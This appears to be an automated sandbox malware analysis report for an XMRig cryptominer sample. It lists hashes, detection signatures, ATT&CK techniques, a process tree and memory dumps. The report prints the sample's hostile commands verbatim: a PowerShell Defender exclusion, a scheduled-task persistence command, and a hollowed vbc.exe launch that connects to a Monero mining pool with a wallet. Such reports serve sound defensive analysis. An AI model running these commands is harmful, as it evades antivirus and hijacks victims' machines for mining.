xmrig | 0141ea4548c515c69c3d61c1463235730c18543654c568512dcedd81d26eeac8

General

Target

7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
Size

648KB
MD5

4f17d8dcc61d0dea7dd6c4cd0162b246
SHA1

d3a2505f416a32ed98e71117db7188cf1a464c5d
SHA256

7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
SHA512

c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
SSDEEP

12288:cm+6CtnUrur4tohP1aYZKHbncTnCQB6X/MJiY:x+rpX0tohhZKb+YM

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1704-186-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1704-187-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/1704-188-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1704-189-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1704-191-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1704-194-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

YHKO.exe

pid process

2412 YHKO.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

YHKO.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation YHKO.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

YHKO.exe

description pid process target process

PID 2412 set thread context of 1704 2412 YHKO.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1080 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2460 timeout.exe

pid	process
2412	YHKO.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	YHKO.exe

description	pid	process	target process
PID 2412 set thread context of 1704	2412	YHKO.exe	vbc.exe

pid	process
1080	schtasks.exe

pid	process
2460	timeout.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exepowershell.exeYHKO.exepowershell.exe

pid	process
2216	7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
2216	7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
4148	powershell.exe
4148	powershell.exe
2412	YHKO.exe
2412	YHKO.exe
4636	powershell.exe
4636	powershell.exe
2412	YHKO.exe
2412	YHKO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exepowershell.exeYHKO.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	2216	7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	2412	YHKO.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeLockMemoryPrivilege	1704	vbc.exe
Token: SeLockMemoryPrivilege	1704	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

1704 vbc.exe

pid	process
1704	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.execmd.exeYHKO.execmd.exe

description	pid	process	target process
PID 2216 wrote to memory of 4148	2216	7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe	powershell.exe
PID 2216 wrote to memory of 4148	2216	7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe	powershell.exe
PID 2216 wrote to memory of 1000	2216	7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe	cmd.exe
PID 2216 wrote to memory of 1000	2216	7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe	cmd.exe
PID 1000 wrote to memory of 2460	1000	cmd.exe	timeout.exe
PID 1000 wrote to memory of 2460	1000	cmd.exe	timeout.exe
PID 1000 wrote to memory of 2412	1000	cmd.exe	YHKO.exe
PID 1000 wrote to memory of 2412	1000	cmd.exe	YHKO.exe
PID 2412 wrote to memory of 4636	2412	YHKO.exe	powershell.exe
PID 2412 wrote to memory of 4636	2412	YHKO.exe	powershell.exe
PID 2412 wrote to memory of 1724	2412	YHKO.exe	cmd.exe
PID 2412 wrote to memory of 1724	2412	YHKO.exe	cmd.exe
PID 1724 wrote to memory of 1080	1724	cmd.exe	schtasks.exe
PID 1724 wrote to memory of 1080	1724	cmd.exe	schtasks.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe
PID 2412 wrote to memory of 1704	2412	YHKO.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
"C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp275E.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:2460

C:\ProgramData\dlllib\YHKO.exe
"C:\ProgramData\dlllib\YHKO.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"
5⤵
- Creates scheduled task(s)
PID:1080

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1704

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\dlllib\YHKO.exe
Filesize
648KB

MD5
4f17d8dcc61d0dea7dd6c4cd0162b246

SHA1
d3a2505f416a32ed98e71117db7188cf1a464c5d

SHA256
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0

SHA512
c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2

Download Submit
C:\ProgramData\dlllib\YHKO.exe
Filesize
648KB

MD5
4f17d8dcc61d0dea7dd6c4cd0162b246

SHA1
d3a2505f416a32ed98e71117db7188cf1a464c5d

SHA256
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0

SHA512
c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp275E.tmp.bat
Filesize
139B

MD5
3e99e38f5daa44be300a6723ed320a98

SHA1
d76f9d4031ee4da0875d68568b8d872f06ed8093

SHA256
73bee727201c07029f8f8ee907a60c6ecebff01f7484575e105830fe5edb65e4

SHA512
896011a739f041574f1b32c912cfcb053f4094e666817b3291ae2a757fc56e90c354c6ed5c5fd19b34bf81b0d2e00d9d253c29720db1591655a0eaa55a30377b

Download Submit
memory/1000-146-0x0000000000000000-mapping.dmp

Download
memory/1080-177-0x0000000000000000-mapping.dmp

Download
memory/1704-188-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1704-186-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1704-187-0x0000000140343234-mapping.dmp

Download
memory/1704-197-0x000001B09A6E0000-0x000001B09A700000-memory.dmp

Filesize
128KB

Download
memory/1704-189-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1704-190-0x000001B09A540000-0x000001B09A560000-memory.dmp

Filesize
128KB

Download
memory/1704-191-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1704-194-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1704-195-0x000001B09A580000-0x000001B09A5C0000-memory.dmp

Filesize
256KB

Download
memory/1704-196-0x000001B09A700000-0x000001B09A720000-memory.dmp

Filesize
128KB

Download
memory/1704-199-0x000001B09A6E0000-0x000001B09A700000-memory.dmp

Filesize
128KB

Download
memory/1704-198-0x000001B09A700000-0x000001B09A720000-memory.dmp

Filesize
128KB

Download
memory/1724-175-0x0000000000000000-mapping.dmp

Download
memory/2216-136-0x00007FFA4BC30000-0x00007FFA4BCED000-memory.dmp

Filesize
756KB

Download
memory/2216-149-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmp

Filesize
10.8MB

Download
memory/2216-148-0x0000000000C00000-0x0000000000C43000-memory.dmp

Filesize
268KB

Download
memory/2216-147-0x0000000000E80000-0x0000000000F88000-memory.dmp

Filesize
1.0MB

Download
memory/2216-144-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmp

Filesize
10.8MB

Download
memory/2216-143-0x00007FFA48B90000-0x00007FFA48CDE000-memory.dmp

Filesize
1.3MB

Download
memory/2216-142-0x0000000000E80000-0x0000000000F88000-memory.dmp

Filesize
1.0MB

Download
memory/2216-141-0x00007FFA68350000-0x00007FFA6837B000-memory.dmp

Filesize
172KB

Download
memory/2216-140-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmp

Filesize
10.8MB

Download
memory/2216-139-0x00007FFA685C0000-0x00007FFA68761000-memory.dmp

Filesize
1.6MB

Download
memory/2216-138-0x0000000000C00000-0x0000000000C43000-memory.dmp

Filesize
268KB

Download
memory/2216-137-0x0000000000E80000-0x0000000000F88000-memory.dmp

Filesize
1.0MB

Download
memory/2216-135-0x00007FFA64470000-0x00007FFA64482000-memory.dmp

Filesize
72KB

Download
memory/2216-134-0x00007FFA682B0000-0x00007FFA6834E000-memory.dmp

Filesize
632KB

Download
memory/2216-133-0x00007FFA4BD80000-0x00007FFA4BE2A000-memory.dmp

Filesize
680KB

Download
memory/2412-168-0x0000000000380000-0x0000000000488000-memory.dmp

Filesize
1.0MB

Download
memory/2412-184-0x0000000003220000-0x0000000003263000-memory.dmp

Filesize
268KB

Download
memory/2412-155-0x0000000000000000-mapping.dmp

Download
memory/2412-159-0x00007FFA4AD80000-0x00007FFA4AE2A000-memory.dmp

Filesize
680KB

Download
memory/2412-173-0x00007FFA49850000-0x00007FFA4A311000-memory.dmp

Filesize
10.8MB

Download
memory/2412-160-0x00007FFA682B0000-0x00007FFA6834E000-memory.dmp

Filesize
632KB

Download
memory/2412-193-0x00007FFA49850000-0x00007FFA4A311000-memory.dmp

Filesize
10.8MB

Download
memory/2412-169-0x00007FFA4AB70000-0x00007FFA4ACBE000-memory.dmp

Filesize
1.3MB

Download
memory/2412-167-0x00007FFA68350000-0x00007FFA6837B000-memory.dmp

Filesize
172KB

Download
memory/2412-178-0x00007FFA66D10000-0x00007FFA66D37000-memory.dmp

Filesize
156KB

Download
memory/2412-179-0x00007FFA4A930000-0x00007FFA4A965000-memory.dmp

Filesize
212KB

Download
memory/2412-180-0x00007FFA49490000-0x00007FFA49592000-memory.dmp

Filesize
1.0MB

Download
memory/2412-181-0x00007FFA67D30000-0x00007FFA67D9B000-memory.dmp

Filesize
428KB

Download
memory/2412-182-0x00007FFA65920000-0x00007FFA6595B000-memory.dmp

Filesize
236KB

Download
memory/2412-183-0x0000000000380000-0x0000000000488000-memory.dmp

Filesize
1.0MB

Download
memory/2412-192-0x0000000000380000-0x0000000000488000-memory.dmp

Filesize
1.0MB

Download
memory/2412-185-0x00007FFA49850000-0x00007FFA4A311000-memory.dmp

Filesize
10.8MB

Download
memory/2412-166-0x00007FFA49850000-0x00007FFA4A311000-memory.dmp

Filesize
10.8MB

Download
memory/2412-165-0x00007FFA685C0000-0x00007FFA68761000-memory.dmp

Filesize
1.6MB

Download
memory/2412-163-0x0000000003220000-0x0000000003263000-memory.dmp

Filesize
268KB

Download
memory/2412-164-0x00007FFA4ACC0000-0x00007FFA4AD7D000-memory.dmp

Filesize
756KB

Download
memory/2412-162-0x0000000000380000-0x0000000000488000-memory.dmp

Filesize
1.0MB

Download
memory/2412-161-0x00007FFA64470000-0x00007FFA64482000-memory.dmp

Filesize
72KB

Download
memory/2460-152-0x0000000000000000-mapping.dmp

Download
memory/4148-153-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmp

Filesize
10.8MB

Download
memory/4148-150-0x00000272FE2F0000-0x00000272FE312000-memory.dmp

Filesize
136KB

Download
memory/4148-145-0x0000000000000000-mapping.dmp

Download
memory/4148-154-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmp

Filesize
10.8MB

Download
memory/4636-170-0x0000000000000000-mapping.dmp

Download
memory/4636-176-0x00007FFA49850000-0x00007FFA4A311000-memory.dmp

Filesize
10.8MB

Download
memory/4636-174-0x00007FFA49850000-0x00007FFA4A311000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads